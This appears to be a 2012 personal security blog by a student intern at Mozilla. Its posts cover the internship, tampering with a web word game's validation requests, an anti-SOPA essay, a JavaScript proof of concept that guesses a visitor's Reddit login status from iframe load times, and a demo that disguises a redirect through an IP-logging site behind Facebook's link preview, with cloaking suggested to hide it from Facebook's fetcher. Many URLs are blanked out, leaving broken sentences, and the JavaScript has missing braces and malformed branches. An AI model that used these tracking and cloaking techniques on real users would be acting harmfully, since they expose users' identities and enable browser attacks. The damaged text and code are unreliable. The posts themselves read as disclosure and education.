My position at Mozilla is on the Security Assurance team as a web application security intern. Essentially, my team and I are responsible for maintaining the security of all of Mozilla's web properties as well as the investigation of security bugs and performing of security reviews for new products. It has been a very interesting position because I am exposed to new security issues each day and rarely do the same thing twice (which is great because I get bored easily). So far I have investigated XSS bugs reported by the community in a number of Mozilla's web pages, analyzed more advanced attacks such as remote code execution, observed Mozilla's web bounty program in action (they pay member's of the community for responsible disclosure of bugs), and performed a security review of an internal project known as Datazilla. I hope to continue investigating security issues as well as take on a number of additional projects.

The environment at Mozilla has been awesome. There is food around every corner (literally) and the workplace is casual and very centered around team-working. Although a number of the employees on my team work remotely, it is not difficult to use IRC or email to communicate. I have also had the opportunity to travel to Mozilla's San Francisco office which has one of the best views of any office I've ever been in. It overlooks the bay directly next to the Bay Bridge.

Although I'm only a few weeks into my internship at Mozilla, I've already been exposed to a number of great learning opportunities. I've also seen how Mozilla operates as an organization and the true commitment of the organization's members to an open web, not bound by proprietary technologies. I am looking forward to a great Summer and Fall before returning to RIT in the Winter.

Tuesday, January 31, 2012

Intercepting Requests in Web Games

[Disclaimer: I am writing this post as an educational look into intercepting and editing GET and POST requests. How you use it is up to you. However, it is not a "security" issue and more of a poor design.]

Most people have probably played some form of online game, especially a "social" game within Facebook. I first got to thinking about these games when a member of the security group I'm in (SPARSA) gave a presentation on editing Android APKs. One demo he gave involved editing the list of approved words in Words with Friends, a Scrabble-like game on Facebook. That demo was done by decompiling the Android APK, editing the source files, and recompiling it. However, since the game had an online counter-part, I wanted to see how Facebook games were sending and receiving their data.

As I mentioned, this application involves playing what is essentially Scrabble with your Facebook friends. To play, a player must use an actual word. On the mobile version, the word is checked against a list of approved words stored within the APK. On the desktop version, the word is sent off to the Zynga's servers to be validated and a response, either valid or invalid, is returned.

As it turns out, intercepting this "word check" is surprisingly simple. In the presentation below, I walk through the steps of intercepting and modifying the GET requests to allow any word to be validated properly, essentially permitting the playing of any word.



Tuesday, January 17, 2012

What's At Stake

In just three hours, the sixth most-visited website on the Internet will transform from a vibrant, virtually unending stockpile of knowledge into a single, blacked-out page. I am 19 years old; since the day my eyelids first fluttered open, technology, computers, and the Internet have been a fact of life, growing at a speed that is incomprehensible to the very people that created it. Over 30 hours of video are uploaded to YouTube every single minute; historic events are now measured in Tweets per Second; Facebook processes more pictures in a single day than there are people on this planet; and the amount of information created, shared, and stored in this year alone is greater than the amount of information created since the dawn of time. I've watched as cities of information have blossomed overnight, built on the social structures of human interaction and desire for attention. I have seen technology connect people, improve lives, save lives, create and destroy relationships, even start and win a revolution. And yet I never imagined that my government, the same government that denounces censorship around the world and that fights for undeniable human rights, would bow to the pressure of the collective corporate world and attempt to pass a law that destroys the very vibrancy and freedom on which the world's network is built.

But here we are. We're at a period in technology history where we are effectively handing control of a network so complex it requires an army of experts to maintain, to elected officials who could be our parents. We are watching as they fumble about, unable to understand the technological marvel and complexity that allows this network to run. Most of these people could not define the word "domain," much less understand how such a trivial-sounding word comprises the structural integrity of the Internet. They are failing us because corporate studios in Hollywood are spending millions of dollars to convince them that a piece of legislature will solve the problem of piracy. Instead of focusing on the underlying causes, these corporations have managed to persuade many Senators and Congressmen to vote on a bill that will cause unimaginable damage to the integrity of the Internet as we know it.

A few years ago, I learned about the immense censorship that occurs in China. I saw two images, side by side representing Google Image results for the term "Tiananmen Square." On the left were the results as seen by Americans: bloody, gory images of a massacre. On the right were the results as seen by the Chinese: a few buildings, a monument, and a sunny sky. The fact that a government could actively suppress information from its citizens, especially information involving historic events, astounded me. I've continued to hear about the Great Firewall of China, a country-wide filter applied to the Internet access of citizens to prevent access to controversial information. And every time I read about this I was thankful that I live in the United States, a place where freedoms of speech and press are building blocks of this country. But today I am not so sure. It's hard to imagine living in a place like China; yet I fear if we wait long enough, without acting, we may someday learn.

SOPA would not censor political sites or hide information from the American public; it's a bill aimed at stopping piracy. Piracy is certainly a major problem that needs to be addressed. However, SOPA would put into place a simple and effective mechanism of shutting down websites without appropriate processes. For demonstrable evidence of this, just look at Wikileaks. With a simple phone call, our government turned pay processors and businesses against it without anything resembling a trial. If SOPA or PIPA passes, those in positions of authority will learn just how easy it is to destroy a website and eventually do just that. I am fearful that SOPA will evolve; it will turn from shutting down a few foreign websites for piracy into a massive effort to purge the Internet of compromising information or material "dangerous to national security." It wouldn't be difficult to convince a judge that a site should be banned and with a flip of a switch without due process, it would be.

Previous generations did not grow up with technology; they did not rely on it or start revolutions with it. But the innovations and amazing changes it has made are ours and our children's. I am not content with handing control of this massive, powerful part of our lives to individuals whose vote can be purchased. We as a nation of students and teachers, employees and employers, and businesses and users need to take back control of what we have created. We need to prove to our elected officials that they are voting with our interests in mind, not those of corporate media.

I am going to watch Wikipedia at midnight. I hope that those we have elected are watching also and that the strike made by a few websites is enough to voice our concerns loud enough for them to hear. I just hope they listen.

Monday, January 16, 2012

Guessing User Logged-In Status With Redirects and Load Times

I've been working on a project that uses non-traditional methods to detect a user's signed-in status to websites. When you visit a page like "," that page first checks to verify whether you are logged in or not. If you are already logged in, the standard "Submit" page is displayed. If you are not, the browser is redirected to the login page. My idea rests on the fact that this redirect takes time; not a significant amount of time, but at least a millisecond or two. If we could somehow record the loading times of these pages, we could, with a fair amount of accuracy, determine whether or not a user is logged in to a particular website.

To do this, I have setup an IFRAME within a website (I'll have to check and see if this works by loading a page as if it were a script, but that's later on the agenda). I then use JavaScript to reload the page and then load the page that the page would have directed to. Let's look at an example.

When you go to and you are logged in, the /submit page is shown. When you are not logged in, you are redirected to, the standard Reddit login page. My script first loads the submit page. If the user is logged in, the page loads, saving its load time to a variable. Then, the timer is reset and the standard login page is loaded. The end result boils down to these facts:

If you ARE logged in, the submit page will load quicker than the login page because no redirect is needed when the submit page is loaded.

If you ARE NOT logged in, the login page will load quicker because the submit page requires a redirect and the login page does not.

There are a few problems that prevent this script from being a 100%. First, despite an initial page load that doesn't count towards the load timer, caching of the browser is not fully predictable. One page may be cached more than another. Second, although the two page loads are performed within 1.2 seconds of each other, network and remote server conditions could change within that time, causing one page to load faster. This is more of a proof-of-concept than a reliable script, but it does show that a remote page could attempt to guess all of the services you use by loading remote pages in hidden IFRAMEs.

See if it works for you:


        <script type="text/javascript">

            var startTime=new Date();
            var a;
            var b;
            var done = 0;

            function currentTime(){
                if(done == 0)
                    done = 1;
                    var ms = 1200;
                    ms += new Date().getTime();
                    while (new Date() < ms){}
                    startTime=new Date();
                else if(done == 1)
                    a=Math.floor((new Date()-startTime)/100)/10;
                    if (a%1==0) a+=".0";
                    done = 2;
                    var ms = 1200;
                    ms += new Date().getTime();
                    while (new Date() < ms){}
                    startTime=new Date();
                    b=Math.floor((new Date()-startTime)/100)/10;
                    if (b%1==0) b+=".0";
                    if(a > (b + .1))
                        document.write('You are not logged into Reddit.');
                        document.write('You are logged into Reddit.');


        <iframe id="framer" src="" onLoad="currentTime()" style="display:none;"></iframe>


Sunday, January 15, 2012

Spreading Malicious Links by Redirecting Facebook's Previewer

When you post a link on Facebook, Facebook has a link fetcher / preview function that visits the website, grabs information about it, along with a thumbnail if available. If you post a link, Facebook's fetcher  is still able to follow through the redirect and grab the end-result information.

Let's start with an example. We have this lovely image of a dog and cat on Imgur (found on /r/aww): Out link is:

Facebook displays the link like so:

Note that once the link converts to a preview, the original text can be replaced.

Notice that the end link (imgur) is displayed and not the original link of But suppose we skip and make our own redirect service. To demo this, I've created a site with a spare domain I have. It is located at: This site is just a redirection service that logs visitor IPs. But if I was to have more malicious intentions, I could have a browser exploit on the page in between Facebook and the redirect. Then, Facebook's preview utility would successfully fetch the end link, but the user clicking it could be exploited. Let's take a look.

My site generates a URL to post.

Now, like in the previous example, I can edit the link and title and unsuspecting users will think it is a cute dog. However, they're actually being redirected through my malicious site (note: it's not actually malicious. It simply logs IP addresses to prove a point, but an attacker could compromise the browser).

I post and wait...

As you can see in this image, I have a click! The redirection was entirely seamless to the user, just like using But without them ever knowing, I have logged their IP, host name, and user agent string. This isn't terrible, but I could have used a browser exploit to compromise their system instead of just redirecting.

But then wouldn't I be attacking Facebook's previewer too, since it visited the site? Well technically yes, unless I wrote a quick PHP script that simply redirects Facebook's IPs but attacks others.

This is just a demo of something I realized. Please don't use it maliciously, but also be aware that any link you click on Facebook could actually go somewhere else that is not what the preview indicates. To help mitigate this problem, Facebook could include an additional warning on links that redirect.